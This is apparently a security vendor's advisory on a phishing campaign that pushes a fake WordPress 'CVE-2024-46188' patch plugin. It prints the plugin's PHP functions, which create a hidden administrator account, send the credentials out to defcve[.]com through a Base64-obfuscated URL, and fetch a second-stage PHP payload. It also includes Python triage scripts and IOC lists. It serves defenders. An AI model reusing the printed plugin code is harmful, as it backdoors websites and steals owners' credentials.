
Alert: WordPress Users Targeted by Newly Emerging CVE-2024-46188 Phishing Scam

Introduction

In the ever-evolving landscape of cybersecurity threats, a new, convincing spear phishing attack has emerged, specifically targeting WordPress website owners. This sophisticated scam, masquerading as an urgent security update from WordPress, exploits the trust of users to execute a malicious agenda. This article delves into the mechanics of this threat, providing insights and actionable advice to safeguard your digital presence.

The Spear Phishing Email

The attack initiates with an email that impersonates the WordPress development team. It warns recipients of a critical Remote Command Execution (RCE) vulnerability, identified as CVE-2024-46188, in the WordPress core. The email, marked by a sense of urgency and panic, instructs users to download and install a plugin that ostensibly patches this vulnerability.

Example of the phishing email, highlighting the urgent call to action.
Highlighted in red, the fraudulent domain used to send the email.

The Fake WordPress Plugin

The plugin, deceptively named “WordPress Patch CVE-2024-46188”, is presented on a website mimicking the official WordPress plugin directory. A notable red flag is a “verified” checkmark next to the plugin developer’s name, a feature absent on the legitimate WordPress site.

Side-by-side comparison of the legitimate and fake WordPress plugin pages.

Technical Breakdown of the Malicious Plugin

Upon analyzing the plugin’s source code, it’s evident that its primary function, SKXWM(), is designed to compromise website security. This function covertly creates a new admin user, granting attackers full control over the WordPress site. It then sends the new user credentials, along with the site URL and user IP, to a remote server. The data exfiltration destination is obfuscated using Base64 encoding, making detection challenging for the untrained eye.

Malicious User Creation

The unauthorized user is created by the function CTFCV(), which takes a password generated by a randomization function and derives the username from a SHA-256 hash of the victim website’s URL (YSSDP() below keeps the last seven hex characters of the hash and Base64-encodes them).

function YSSDP($salt = "") {
	// Derives a deterministic username from the victim site's URL: the last 7 hex
	// characters of sha256(salt . siteurl), Base64-encoded with the "=" padding stripped
	$siteUrl = get_option('siteurl');
	$shortName = substr(hash('sha256', $salt.$siteUrl), -7);
	return str_replace("=", "", base64_encode($shortName));
}

function CTFCV($password) {
	// Creates the rogue account with the derived username and promotes it to administrator,
	// unless a user with that name already exists
	require(__DIR__.'/../../../wp-includes/registration.php');
	if (!username_exists(YSSDP())) {
		$user_id = wp_create_user(YSSDP(), $password);
		$user = new WP_User($user_id);
		$user->set_role('administrator');
	}
}
Credential Exfiltration & Secondary Payload

The maliciously generated credentials are exfiltrated by decoding scanningToken, which contains a Base64-encoded URL. An HTTP GET request is then made to the decoded URL, carrying the location of the victim website, the newly created user, and additional details. After the credentials are exfiltrated, a secondary payload is installed in the WordPress core via the COYGC() function, which retrieves it from https://defcve[.]com/runscan as Base64-encoded PHP that appears to be the ACE in-browser IDE with additional modifications.
function SKXWM() {
	// Runs on plugin activation: builds the exfiltration message, sends it,
	// then creates the admin user and fetches the second-stage payload
	add_option( 'Activated_Plugin', 'Wordpress Security' );
	$siteUrl = get_option('siteurl');
	/* activation code here */
	// YRNZL(), YPRXK() and FRYYD() are further plugin helpers (random password,
	// dropped file name, visitor IP) that are not reproduced in this advisory
	$testRandomPassword = YRNZL(10);
	$message = "url: $siteUrl\nuser: ".YSSDP()."\npassword: $testRandomPassword\nscanned result: $siteUrl/".YPRXK()."\n\nuserip: ".FRYYD()."\n ---";
	// Base64 of the exfiltration endpoint https://defcve[.]com/wpapi?siteurl=
	$scanningToken = "aHR0cHM6Ly9kZWZjdmUuY29tL3dwYXBpP3NpdGV1cmw9";
	// The credentials leave the site as a Base64 blob in the query string of a GET request
	file_get_contents(base64_decode($scanningToken).urlencode(base64_encode($message)));
	CTFCV($testRandomPassword);
	COYGC();

	wp_redirect( admin_url( 'admin.php?page=wordpress-security' ) );
}

function COYGC() {
	// Base64 of the payload source https://defcve[.]com/runscan
	$scanningToken = "aHR0cHM6Ly9kZWZjdmUuY29tL3J1bnNjYW4=";
	$contents = @file_get_contents(base64_decode($scanningToken));
	// Writes the decoded PHP into the plugin directory, then copies it into the WordPress root
	@file_put_contents(__DIR__.'/'.YPRXK(), base64_decode($contents));
	copy(__DIR__.'/'.YPRXK(), __DIR__.'/../../../'.YPRXK());
}
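To turn the two listings above (the username derivation in YSSDP()/CTFCV() and the Base64 tokens in SKXWM()/COYGC()) into a triage check, the following Python script is added here as an illustration; it is not part of the advisory or of the malicious plugin. It decodes the two hard-coded scanningToken values to expose the plaintext URLs, reimplements YSSDP() so an administrator can compute the username the plugin would have created for a given site URL, and looks for that name among administrator accounts. The site URL and the user records are constructed sample values; in practice the records would come from `wp user list --fields=user_login,roles --format=json` and the URL from the site's `siteurl` option.

```python
import base64
import hashlib

# The two Base64 tokens hard-coded in the plugin's SKXWM() and COYGC() (copied from the listings).
SCANNING_TOKEN_EXFIL = "aHR0cHM6Ly9kZWZjdmUuY29tL3dwYXBpP3NpdGV1cmw9"
SCANNING_TOKEN_PAYLOAD = "aHR0cHM6Ly9kZWZjdmUuY29tL3J1bnNjYW4="


def decode_token(token: str) -> str:
    """Recover the plaintext URL hidden in one of the plugin's 'scanningToken' strings."""
    return base64.b64decode(token).decode("ascii")


def expected_rogue_username(site_url: str, salt: str = "") -> str:
    """Python reimplementation of the plugin's YSSDP(): last 7 hex characters of
    sha256(salt . siteurl), Base64-encoded, with '=' padding removed.
    The plugin calls YSSDP() with the default empty salt, and site_url must be
    given exactly as stored in the WordPress 'siteurl' option."""
    digest = hashlib.sha256((salt + site_url).encode("utf-8")).hexdigest()
    short_name = digest[-7:]
    return base64.b64encode(short_name.encode("ascii")).decode("ascii").rstrip("=")


def find_rogue_admins(site_url: str, users: list) -> list:
    """Return the user records whose login equals the derived name and that hold the
    administrator role. `users` follows the shape of `wp user list --format=json`
    output: dicts with 'user_login' and a comma-separated 'roles' string."""
    expected = expected_rogue_username(site_url)
    return [
        u for u in users
        if u.get("user_login") == expected and "administrator" in u.get("roles", "")
    ]


if __name__ == "__main__":
    site = "https://example.com"  # constructed sample value; use your site's 'siteurl' option
    sample_users = [  # constructed records mimicking wp user list output
        {"user_login": "admin", "roles": "administrator"},
        {"user_login": expected_rogue_username(site), "roles": "administrator"},
        {"user_login": "editor", "roles": "editor"},
    ]
    print("exfiltration endpoint:", decode_token(SCANNING_TOKEN_EXFIL))
    print("payload source:       ", decode_token(SCANNING_TOKEN_PAYLOAD))
    for u in find_rogue_admins(site, sample_users):
        print("rogue administrator candidate:", u["user_login"])
```

A match on the derived name is a strong indicator because the name is deterministic for a given site URL, but its absence proves nothing: the account may have been renamed, or the site URL in the database may differ from the one used at activation time. Any administrator account you did not create should be treated as suspicious regardless of its name.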

Indicators of Compromise (IOCs)

The following indicators of compromise should be checked for when investigating a potential compromise of your hosting environment and WordPress website:

Domain Names: 

  • mailing-wordpress[.]org
  • en-wordpress[.]org
  • us.en-wordpress[.]org
  • defcve[.]com

Email Addresses: 

  • no-reply[@]mailing-wordpress.com

URLs: 

  • https://us.en-wordpress[.]org/plugins/cve-2024-46188/
  • https://defcve[.]com/wpapi?siteurl=
  • https://defcve[.]com/runscan

Other Indicators: 

  • CVE-2024-46188 (This CVE does not yet exist, and is illegitimate)
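The indicators above can be swept across mail, proxy and web-server logs with a small matcher. The following Python script is added here as an illustration and is not part of the advisory; it refangs the published indicators, matches domains (including their subdomains) on label boundaries so that legitimate wordpress.org traffic is not flagged, and reports the most specific indicator for each line. The log lines in the block are constructed samples.

```python
import re

# Indicators as published in the advisory (defanged); the email address is listed as published.
IOC_DOMAINS = ["mailing-wordpress[.]org", "en-wordpress[.]org", "defcve[.]com"]
IOC_EMAILS = ["no-reply[@]mailing-wordpress.com"]
IOC_URL_PREFIXES = ["https://defcve[.]com/wpapi?siteurl=", "https://defcve[.]com/runscan"]


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into its matchable form."""
    return ioc.replace("[.]", ".").replace("[@]", "@").replace("hxxp", "http")


def _domain_pattern(domain: str) -> re.Pattern:
    # Match the domain or any subdomain of it (a preceding '.' is allowed), but not a
    # longer label such as "notdefcve.com" or "defcve.com-cdn.example".
    return re.compile(r"(?<![A-Za-z0-9-])" + re.escape(domain) + r"(?![A-Za-z0-9-])", re.I)


# Ordered most specific first: exact URL prefixes, then sender addresses, then bare domains.
_MATCHERS = (
    [(label, re.compile(re.escape(refang(label)), re.I)) for label in IOC_URL_PREFIXES]
    + [(label, re.compile(re.escape(refang(label)), re.I)) for label in IOC_EMAILS]
    + [(label, _domain_pattern(refang(label))) for label in IOC_DOMAINS]
)


def scan_lines(lines):
    """Return (line_number, indicator) pairs; each line is reported once, with the
    most specific indicator that matched."""
    hits = []
    for number, line in enumerate(lines, 1):
        for label, pattern in _MATCHERS:
            if pattern.search(line):
                hits.append((number, label))
                break
    return hits


# Constructed sample lines in the style of a mail log, a proxy log and a web-server log.
SAMPLE_LOG = [
    "Jan 15 09:12:01 mx postfix/smtpd[1234]: connect from mail.mailing-wordpress.org[203.0.113.10]",
    "2024-01-15T09:13:44Z proxy CONNECT defcve.com:443 client=10.0.0.5",
    'GET https://defcve.com/wpapi?siteurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ== "PHP/8.1"',
    "GET https://api.wordpress.org/plugins/info/1.2/ 200",
    "GET https://us.en-wordpress.org/plugins/cve-2024-46188/ 200",
    "From: WordPress <no-reply@mailing-wordpress.com>",
]

if __name__ == "__main__":
    for number, label in scan_lines(SAMPLE_LOG):
        print(f"line {number}: {label}")
```

Web-server logs from the compromised site itself will usually not show the outbound request to defcve.com, since file_get_contents() runs server-side; egress proxy, firewall or DNS resolver logs are the place to look for that traffic.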


Protecting Yourself and Your WordPress Site

To avoid falling prey to such attacks, always verify the authenticity of emails claiming to be from WordPress. Be cautious of urgent language and unsolicited downloads. Regularly update your WordPress site and plugins from official sources and consider using security plugins for enhanced protection.

What to Do If You Suspect a Compromise

If you suspect that your site has been compromised, immediately change all passwords and user roles, and scan your site for unauthorized plugins or users. It’s crucial to involve cybersecurity professionals who can thoroughly investigate and remediate the issue.

If your website has been affected, or if you’re unsure about your site’s security, contact our US-based critical incident response team for immediate, expert assistance. Our dedicated team specializes in resolving complex cybersecurity challenges and ensuring your digital assets are secure. 

Concerned your systems are compromised?

Our incident response team is on standby 24/7, year round, to assist your needs!

Additional information and details will be published as they are received. For IOC and code samples, please reach out via our contact form, or other methods of contact. 
